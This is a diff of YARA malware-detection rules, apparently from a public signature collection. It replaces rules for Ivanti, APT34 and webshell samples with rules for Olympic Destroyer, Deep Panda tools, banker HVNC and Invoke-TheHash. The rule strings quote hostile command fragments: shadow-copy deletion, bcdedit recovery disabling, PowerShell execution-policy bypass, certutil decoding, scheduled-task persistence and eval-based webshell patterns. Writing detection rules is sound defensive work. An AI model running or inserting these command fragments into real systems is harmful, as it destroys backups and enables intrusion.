-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L16-L32"
+		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_evilcorp_dridex_banker.yar#L8-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0083727e34118d628c8507459bfb7f949f11af8197e201066e29e263e2c3f944"
-		score = 85
+		logic_hash = "5ca09e9c7d94e949e453d1bb69b566c12b253579cbcae700929d4f517df35a0a"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-35078, FILE"
-		hash1 = "6255c75e2e52d779da39367e7a7d4b8d1b3c9c61321361952dcc05819251a127"
+		tags = ""
 
 	strings:
-		$s1 = "logsPaths.txt" ascii fullword
-		$s2 = "keywords.txtFirefox" ascii
+		$s0 = "socks5_2_x32.dll"
+		$s1 = "socks5_2_x64.dll"
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 20KB and all of them
+		any of ( $s* ) and pe.exports ( "start" )
 }
-rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Logclear_JAVA_Aug23 : CVE_2023_35078 FILE
+
+rule SIGNATURE_BASE_Crime_Win32_Hvnc_Banker_Gen
 {
 	meta:
-		description = "Detects LogClear.class found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
-		author = "Florian Roth"
-		id = "e1ef3bf3-0107-5ba6-a49f-71e079851a4f"
-		date = "2023-08-01"
+		description = "Detects malware banker hidden VNC"
+		author = "@VK_Intel"
+		id = "5e13f4a9-2231-524f-82b2-fbc6d6a43b6f"
+		date = "2020-04-06"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L34-L53"
+		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_evilcorp_dridex_banker.yar#L22-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c42c2eca784d7089aab56addca11bad658a4a6c34a81ae823bd0c3dad41a1c99"
-		score = 80
+		logic_hash = "b01af685c3826834aadaf4eac1f1d8171db288a2efa7b769d8122421f7af8d7e"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-35078, FILE"
-		hash1 = "deb381c25d7a511b9eb936129eeba2c0341cff7f4bd2168b05e40ab2ee89225e"
-
-	strings:
-		$s1 = "logsPaths.txt" ascii fullword
-		$s2 = "log file: %s, not read" ascii fullword
-		$s3 = "/tmp/.time.tmp" ascii fullword
-		$s4 = "readKeywords" ascii fullword
-		$s5 = "\"----------------  ----------------" ascii fullword
+		tags = ""
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 20KB and 4 of them or all of them
+		pe.exports( "VncStartServer" ) and pe.exports ( "VncStopServer" )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Xsltransform_Aug21 : FILE
+rule SIGNATURE_BASE_Destructive_Ransomware_Gen1 : FILE
 {
 	meta:
-		description = "Detects an ASPX webshell utilizing XSL Transformations"
-		author = "Max Altgelt"
-		id = "44254084-a717-59e6-a3ac-eca3c1c864a8"
-		date = "2020-02-23"
+		description = "Detects destructive malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3a7ce55e-fb28-577b-91bb-fe02d7b3d73c"
+		date = "2018-02-12"
 		modified = "2023-12-05"
-		reference = "https://gist.github.com/JohnHammond/cdae03ca5bc2a14a735ad0334dcb93d6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/webshell_xsl_transform.yar#L1-L19"
+		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_olympic_destroyer.yar#L13-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3ac0b50adc4c56769d0248e213e9426a22e0f5086bf081da57f835ff1c77b716"
+		logic_hash = "1f7a41c5a7e812e0e26b346cc6465290b17aff31620cbcf6e01c569d8eea2dbd"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85"
 
 	strings:
-		$csharpshell = "Language=\"C#\"" nocase
-		$x1 = "<root>1</root>"
-		$x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String("
-		$s1 = "XsltSettings.TrustedXslt"
-		$s2 = "Xml.XmlUrlResolver"
-		$s3 = "FromBase64String(Request[\""
+		$x1 = "/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" fullword wide
+		$x2 = "delete shadows /all /quiet" fullword wide
+		$x3 = "delete catalog -quiet" fullword wide
 
 	condition:
-		filesize < 500KB and $csharpshell and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_APT34_Malware_HTA : FILE
+
+rule SIGNATURE_BASE_Olympicdestroyer_Gen2 : FILE
 {
 	meta:
-		description = "Detects APT 34 malware"
+		description = "Detects Olympic Destroyer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "683faded-7e4b-5b2f-9f85-300db96ed9d1"
-		date = "2017-12-07"
+		id = "8d0cbb7b-6650-53ed-8d58-176f8b4af880"
+		date = "2018-02-12"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt34.yar#L12-L32"
+		reference = "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_olympic_destroyer.yar#L30-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0bf9b988b3ef46df29e0f91c3ea186aaab8a1ccb79563e97521311bf2e1215d7"
+		logic_hash = "1bcf0e95d9de62271a09f6ac64ce65debc91e541e1fccfe5c31661466c00bd5e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a"
+		hash1 = "d934cb8d0eadb93f8a57a9b8853c5db218d5db78c16a35f374e413884d915016"
+		hash2 = "3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2"
+		hash3 = "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"
+		hash4 = "28858cc6e05225f7d156d1c6a21ed11188777fa0a752cb7b56038d79a88627cc"
 
 	strings:
-		$x1 = "WshShell.run \"cmd.exe /C C:\\ProgramData\\" ascii
-		$x2 = ".bat&ping 127.0.0.1 -n 6 > nul&wscript  /b" ascii
-		$x3 = "cmd.exe /C certutil -f  -decode C:\\ProgramData\\" ascii
-		$x4 = "a.WriteLine(\"set Shell0 = CreateObject(" ascii
-		$x5 = "& vbCrLf & \"Shell0.run" ascii
-		$s1 = "<title>Blog.tkacprow.pl: HTA Hello World!</title>" fullword ascii
-		$s2 = "<body onload=\"test()\">" fullword ascii
+		$x1 = "cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt" fullword wide
+		$x2 = "cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^(\"Scripting.FileSystemObject\"^)" wide
+		$x3 = "del %programdata%\\evtchk.txt" fullword wide
+		$x4 = "Pyeongchang2018.com\\svc_all_swd_installc" fullword ascii
+		$s1 = "<STARTCRED>" fullword wide
+		$s2 = "SELECT ds_cn FROM ds_computer" fullword wide
+		$s3 = "\\system32\\notepad.exe" wide
+		$s4 = "%s \\\\%s -u \"%s\" -p \"%s\" -accepteula -d %s %s \"%s\"" fullword ascii
 
 	condition:
-		filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "fd7200dcd5c0d9d4d277a26d951210aa" or pe.imphash ( ) == "975087e9286238a80895b195efb3968d" or pe.imphash ( ) == "da1c2d7acfe54df797bfb1f470257bc3" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT34_Malware_Exeruner : FILE
+rule SIGNATURE_BASE_Deeppanda_Sl_Txt_Packed
 {
 	meta:
-		description = "Detects APT 34 malware"
+		description = "Hack Deep Panda - ScanLine sl-txt-packed"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ddfa59d-9b8a-5cb6-a992-6498ac9be75d"
-		date = "2017-12-07"
+		id = "7a335810-2bf9-5a0b-bef4-1bade65a0f00"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt34.yar#L34-L59"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71840d9a0f8a5dc39656e6bf1ad94fa275bcd18baf6b374dfe040c161d62a960"
+		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
+		logic_hash = "37f875dcb2c920278c2625085c97a9dcce1907198409595a10e6a3fbce767f35"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a"
 
 	strings:
-		$x1 = "\\obj\\Debug\\exeruner.pdb" ascii
-		$x2 = "\"wscript.shell`\")`nShell0.run" wide
-		$x3 = "powershell.exe -exec bypass -enc \" + ${global:$http_ag} +" wide
-		$x4 = "/c powershell -exec bypass -window hidden -nologo -command " fullword wide
-		$x5 = "\\UpdateTasks\\JavaUpdatesTasksHosts\\" wide
-		$x6 = "schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn" wide
-		$x7 = "UpdateChecker.ps1 & ping 127.0.0.1" wide
-		$s8 = "exeruner.exe" fullword wide
-		$s9 = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";" fullword wide
-		$s10 = "C:\\ProgramData\\Windows\\Microsoft\\java" fullword wide
-		$s11 = "function runByVBS" fullword wide
-		$s12 = "$84e31856-683b-41c0-81dd-a02d8b795026" fullword ascii
-		$s13 = "${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGk" wide
+		$s0 = "Command line port scanner" fullword wide
+		$s1 = "sl.exe" fullword wide
+		$s2 = "CPports.txt" fullword ascii
+		$s3 = ",GET / HTTP/.}" fullword ascii
+		$s4 = "Foundstone Inc." fullword wide
+		$s9 = " 2002 Foundstone Inc." fullword wide
+		$s15 = ", Inc. 2002" fullword ascii
+		$s20 = "ICMP Time" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Eraser_1 : FILE
+rule SIGNATURE_BASE_Deeppanda_Lot1
 {
 	meta:
-		description = "Detects malware used in attack on academic data centers"
+		description = "Hack Deep Panda - lot1.tmp-pwdump"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36d17887-9844-5fa4-8a0d-89cc41b2d876"
-		date = "2020-05-16"
+		id = "c72120a5-8637-580c-9856-e070dfb6df94"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_academic_data_centers_camp_may20.yar#L1-L18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L24-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a0410e86fa8fb8b599e5b8a6508d6889eb6e26600f0ecf222561ac4a169676d"
+		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
+		logic_hash = "92169a1288f30dc6008e1a8c9b2b700f878c90aa09634e36fea586e19657dbd1"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "552245645cc49087dfbc827d069fa678626b946f4b71cb35fa4a49becd971363"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc2 = { E6 FF FF 48 89 45 D0 8B 45 E0 BA 00 00 00 00 BE
-               00 00 00 00 89 C7 E8 }
-		$sc3 = { E6 FF FF 89 45 DC 8B 45 DC 83 C0 01 48 98 BE 01
-               00 00 00 48 89 C7 E8 }
+		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s2 = "Target: Failed to load SAM functions." fullword ascii
+		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
+		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
+		$s12 = "PwDump.exe" fullword ascii
+		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+		$s16 = "dump logon session" fullword ascii
+		$s17 = "Timed out waiting to get our pipe back" fullword ascii
+		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+		$s20 = "%s\\%s.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 60KB and all of them
+		10 of them
 }
-rule SIGNATURE_BASE_APT_LNX_Academic_Camp_May20_Loader_1 : FILE
+rule SIGNATURE_BASE_Deeppanda_Htran_Exe
 {
 	meta:
-		description = "Detects malware used in attack on academic data centers"
+		description = "Hack Deep Panda - htran-exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cda65abd-d918-5ee6-8f4a-554d47532d76"
-		date = "2020-05-16"
+		id = "2a551e82-aff1-5a77-bc5e-d06e49dca8bc"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "https://csirt.egi.eu/academic-data-centers-abused-for-crypto-currency-mining/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_academic_data_centers_camp_may20.yar#L20-L35"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L51-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a73883f9fdf3d53694d9f9efec5f8f15994c5fd80c5f2a87b1741db6b954a023"
+		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
+		logic_hash = "9ac5ddc53d3d5292acb3dcf68e66bc3f6ab4b8e61a71597dd84454adc516f95d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "0efdd382872f0ff0866e5f68f0c66c01fcf4f9836a78ddaa5bbb349f20353897"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { C6 45 F1 00 C6 45 F2 0A C6 45 F3 0A C6 45 F4 4A
-               C6 45 F5 04 C6 45 F6 06 C6 45 F7 1B C6 45 F8 01 }
-		$sc2 = { 01 48 39 EB 75 EA 48 83 C4 08 5B 5D 41 5C 41 5D }
+		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s2 = "\\Release\\htran.pdb" ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s8 = "======================== htran V%s =======================" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 10KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_B374K_Back_Connect : FILE
+rule SIGNATURE_BASE_Deeppanda_Trojan_Kakfum
 {
 	meta:
-		description = "Detects privilege escalation tool"
+		description = "Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8612bda2-2576-56c0-a4ba-afbef419ab05"
-		date = "2016-08-18"
+		id = "a204f9cb-65f8-53ea-a4eb-d89112942073"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "Internal Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_b374k_extra.yar#L8-L24"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_deeppanda.yar#L72-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd89aefb6c1add44bfe2a706cd161a16f36a649f910ace16b641a7836525aa73"
-		score = 80
-		quality = 85
-		tags = "FILE"
+		logic_hash = "0710edea973dce6f5feccf2e7e508cd5f65aa451e0bb5aca503778ffe2363401"
+		score = 75
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c8e16f71f90bbaaef27ccaabb226b43762ca6f7e34d7d5585ae0eb2d36a4bae5"
+		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
 
 	strings:
-		$s1 = "AddAtomACreatePro" fullword ascii
-		$s2 = "shutdow" fullword ascii
-		$s3 = "/config/i386" fullword ascii
+		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+		$s1 = "%s\\sqlsrv32.dll" fullword ascii
+		$s2 = "%s\\sqlsrv64.dll" fullword ascii
+		$s3 = "%s\\%d.tmp" fullword ascii
+		$s4 = "ServiceMaix" fullword ascii
+		$s15 = "sqlserver" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Chinachopper_Generic : FILE
+rule SIGNATURE_BASE_Invoke_Smbexec : FILE
 {
 	meta:
-		description = "China Chopper Webshells - PHP and ASPX"
+		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2473cef1-88cf-5b76-a87a-2978e6780b4f"
-		date = "2015-03-10"
-		modified = "2022-10-27"
-		reference = "https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_webshell_chinachopper.yar#L2-L19"
+		id = "07c742f4-3039-5c84-81d4-73ad25b98681"
+		date = "2017-06-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "34cb81b077d6dae5b4565001b2ab28897c6c554f00aa102601fb9c416c6c0f09"
+		logic_hash = "cc9feb7d4eadfc470aabf18d82c884f454ebcdd37f3ca6b0ee4b3634cd9e33ae"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
 
 	strings:
-		$x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(Request\.Item\[.{,100}unsafe/
-		$x_php = /<?php.\@eval\(\$_POST./
-		$fp1 = "GET /"
-		$fp2 = "POST /"
+		$x1 = "Invoke-SMBExec -Target" fullword ascii
+		$x2 = "$packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID" fullword ascii
+		$s1 = "Write-Output \"Command executed with service $SMB_service on $Target\"" fullword ascii
+		$s2 = "$packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00" fullword ascii
+		$s3 = "$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \\svcctl" fullword ascii
 
 	condition:
-		filesize < 300KB and 1 of ( $x* ) and not 1 of ( $fp* )
+		( filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_Projectm_Darkcomet_1 : FILE
+rule SIGNATURE_BASE_Invoke_Wmiexec_Gen_1
 {
 	meta:
-		description = "Detects ProjectM Malware"
+		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6de74d73-f9b2-5e7f-b15e-f850425d849c"
-		date = "2016-03-26"
-		modified = "2023-01-27"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_m.yar#L10-L30"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cc488690ce442e9f98bac651218f4075ca36c355d8cd83f7a9f5230970d24157"
-		logic_hash = "81ffaa382bb6f817fe2917a096a3eee49d2e8c281271da551ccd65679692712f"
+		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
+		date = "2017-06-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L32-L51"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "12aeba5255527a337c49f1c4d1dc506a13ea02da69a8fc509c77bcb07c2135c8"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97"
+		hash2 = "7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07"
 
 	strings:
-		$x1 = "DarkO\\_2" fullword ascii
-		$a1 = "AVICAP32.DLL" fullword ascii
-		$a2 = "IDispatch4" fullword ascii
-		$a3 = "FLOOD/" fullword ascii
-		$a4 = "T<-/HTTP://" ascii
-		$a5 = "infoes" fullword ascii
+		$x1 = "Invoke-WMIExec " ascii
+		$x2 = "$target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))" fullword ascii
+		$s1 = "Import-Module $PWD\\Invoke-TheHash.ps1" fullword ascii
+		$s2 = "Import-Module $PWD\\Invoke-SMBClient.ps1" fullword ascii
+		$s3 = "$target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList" fullword ascii
+		$x4 = "Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Projectm_Crimsondownloader : FILE
+rule SIGNATURE_BASE_Invoke_Smbexec_Invoke_Wmiexec_1
 {
 	meta:
-		description = "Detects ProjectM Malware"
+		description = "Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e0658c9-a93d-5eef-93a2-eb1ab29acaee"
-		date = "2016-03-26"
+		id = "fd1c6599-028d-5535-beb8-5b2658481b97"
+		date = "2017-06-14"
 		modified = "2023-12-05"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/03/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_m.yar#L32-L51"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L53-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dc8bd60695070152c94cbeb5f61eca6e4309b8966f1aa9fdc2dd0ab754ad3e4c"
-		logic_hash = "3c9a4f5aca4c9fc26d371027a32e349a456ef25d6b403a66b9afb1ee19dd4d00"
+		logic_hash = "feb2973cd7e2c221cd91ec543f1d943cf1b5d5d18fe74c8f7e58341f76f95b51"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+		hash2 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
 
 	strings:
-		$x1 = "E:\\Projects\\m_project\\main\\mj shoaib"
-		$s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii
-		$s2 = "secure_scan.exe" fullword wide
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|mswall" fullword wide
-		$s4 = "secure_scan|mswall" fullword wide
-		$s5 = "[Microsoft-Security-Essentials]" fullword wide
+		$s1 = "$process_ID = $process_ID -replace \"-00-00\",\"\"" fullword ascii
+		$s2 = "Write-Output \"$Target did not respond\"" fullword ascii
+		$s3 = "[Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and $x1 ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_APT15_Malware_Mar18_Royalcli : FILE
+rule SIGNATURE_BASE_Invoke_Wmiexec_Gen
 {
 	meta:
-		description = "Detects malware from APT 15 report by NCC Group"
+		description = "Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "165bfa6c-1a8d-5628-8c35-da4e4a2ae04f"
-		date = "2018-03-10"
+		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
+		date = "2017-06-14"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HZ5XMN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt15.yar#L13-L32"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_thehash.yar#L72-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27fb5e8ff299201d1d13f4a45c401570f76ddfa4c3c1153eff50187170ada06e"
+		logic_hash = "1ee79b7ea576adb71bde903756cda7af22e55eee9c4c3964cc9edc8930083fa2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
